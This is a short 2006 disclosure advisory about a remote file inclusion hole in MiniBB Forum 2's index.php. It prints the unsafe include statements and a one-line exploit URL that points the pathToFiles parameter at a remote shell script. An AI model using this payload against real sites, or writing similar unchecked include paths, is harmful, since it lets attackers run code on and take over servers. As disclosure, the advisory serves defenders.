Security Advisory: New Bug MiniBB Forum <= 2 Remote File Include (index.php)

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  SiteXpress SQL Injection
  SiteXpress SQL Injection
  [Full-disclosure] Advisory 14/2006: Dotdeb PHP Email Header Injection Vulnerability
  ASPintranet SQL Injection

From: philip anselmo <spoonman500_(at)_hotmail.com>
Date: 14.11.2006
Subject: New Bug MiniBB Forum <= 2 Remote File Include (index.php)

Title : MiniBB Forum <= 2 Remote File Include (index.php)
########################################################################
#######

Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}

------------------------------------------------------------------------
Sorce Code:
http://www.minibb.net/download.php?file=minibb20
-----

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : MiniBB Forum 2 (index.php)version :
version [ 2 ]
exploit :Remote File Include
------------------------------------------------------------------------
-----
Vulnerable Code:
include ($pathToFiles.'setup_'.$DB.'.php');
include ($pathToFiles.'bb_cookie.php');
include ($pathToFiles.'bb_functions.php');
include ($pathToFiles.'bb_specials.php');
----------------------------------------------------------------------
Exploit:
http://www.VicTim.com/[Script_Path]/index.php?pathToFiles=Shell.txt?

------------------------------------------------------------------------
----

greetz: Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco

Special Greeting:AsbMay's Group

channel:www.asb-may.net

contact:spoonman500[at]hotmail[dot]com

_________________________________________________________________
MSN Hotmail sur i-mode™ : envoyez et recevez des e-mails depuis votre
telephone portable ! http://www.msn.fr/hotmailimode/